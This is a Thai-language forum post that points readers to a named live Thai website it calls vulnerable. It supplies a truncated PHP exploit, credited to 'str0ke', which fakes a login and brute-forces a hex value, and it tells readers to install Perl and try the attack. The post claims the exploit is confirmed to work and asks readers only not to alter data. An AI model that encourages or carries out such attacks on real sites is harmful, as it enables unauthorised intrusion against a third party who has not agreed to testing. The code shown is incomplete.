เคยดู Video มาก็มากคงไม่ได้ประโยชน์ไรถ้าดูอย่างเดียววันนี้เอาตัวเองเว็บไทยที่มีช่องโหว่มาให้ลองกันสดๆเลย
มีเครื่องมือมาวางให้+ เว็บให้ลอง เสร็จสรรพหวังว่าคงศึกษาเองกันเป็นนะครับหวังว่าคงไม่ต้องถามว่าใช้อย่างไรนะครับ
แนะนำว่าให้อ่าน sourcecode ด้วยว่าเขาแนะนำว่าอะไร แล้วก็ให้ลง Perl ก่อน
ยืนยันแล้วว่าใช้ได้ลองศึกษากันดู
สำคัญ: หากใช้เป็นแล้วอย่าไปลบหรือเปลี่ยนแปลงข้อมูลของเขานะครับ เราลองเพื่อศึกษาเท่านั้น ไม่ใช่สร้างความเดือดร้อน
เว็บที่ให้ลองคือ
http://thaihack.boxchart.com/index.php
โดยใช้ exploit เหล่านี้
[code]<?php
/*
<= 1.3.1 Final
/str0ke
*/
$server = "SERVER";
$port = 80;
$file = "PATH";
$target = 81;
/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";
$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
Reply With Quote
ผมแฮคไม่เปนนี่ 
